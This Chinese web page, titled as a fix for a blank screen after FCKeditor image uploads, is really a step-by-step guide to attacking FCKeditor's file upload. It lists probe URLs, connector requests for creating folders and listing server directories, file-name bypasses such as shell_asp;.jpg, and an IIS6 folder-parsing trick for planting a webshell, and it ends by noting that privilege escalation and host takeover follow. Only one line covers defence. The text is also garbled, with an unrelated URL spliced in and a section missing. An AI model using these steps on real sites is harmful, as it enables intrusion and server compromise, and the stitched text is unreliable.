当前位置:首页 > 经验

fckeditor上传图片后出现白屏的原因 fckeditor上传图片后出现白屏

一. 关于FCKeditor

FCKeditor是一个网页文本编辑器,在很多的内容管理系统里都有用到

本文简单介绍通过FCKeditor上传漏洞进行攻击的思路,并对可能用到的操作进行整理

二. 攻击思路

1.查看FCKeditor版本

http://127.0.0.1/fckeditor/editor/dialog/fck_about.html

http://127.0.0.1/FCKeditor/_whatsnew.html

2.测试上传点

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

FCKeditor/_samples/default.html

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp#

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php#

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx#

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp#

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html#

Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/conne

ctor.php

FCKeditor/editor/filemanager/browser/default/browser.html#

Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/conne

ctor.asp

FCKeditor/editor/filemanager/browser/default/browser.html#

Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/conn

ector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html#

Type=Image&Connector=http://d.aap5.com/20220723/d=70130000000liBh&internal=true的文件后,会自动将文件名改为shell_asp;.jpg。可以继续上传同名

文件,文件名会变为shell.asp;(1).jpg

3.2.2提交shell.php+空格绕过

空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制。

3.3 IIS6.0突破文件夹限制

Fckeditor/editor/filemanager/connectors/asp/connector.asp#

Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp#

Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=124478997568

4

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp#

Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

3.4 文件解析限制

通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的

webshell文件,获取其shell。

http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg

4.列目录

4.1 FCKeditor/editor/fckeditor.html


FCKeditor/editor/fckeditor.html不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳

转至可上传文件页,可以查看已经上传的文件。

4.2 根据xml返回信息查看网站目录

http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.as

px#Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

4.3 获取当前文件夹

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx#

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php#

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp#

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

4.4 浏览E盘文件

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx#

Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

5. 连接木马

在木马能够解析之后,使用各类工具连接到木马,获取webshell。至此,利用FCKeditor进行文件上传

并攻击的过程就已经完成

三. 其他

在获取到webshell之后,可以进行的操作非常多,也便于提权操作,拿下主机权限并不困难。

关于该漏洞的防御,可以删除掉所有的上传点,并限制目录访问。

声明:此文信息来源于网络,登载此文只为提供信息参考,并不用于任何商业目的。如有侵权,请及时联系我们:fendou3451@163.com
标签:

  • 关注微信

相关文章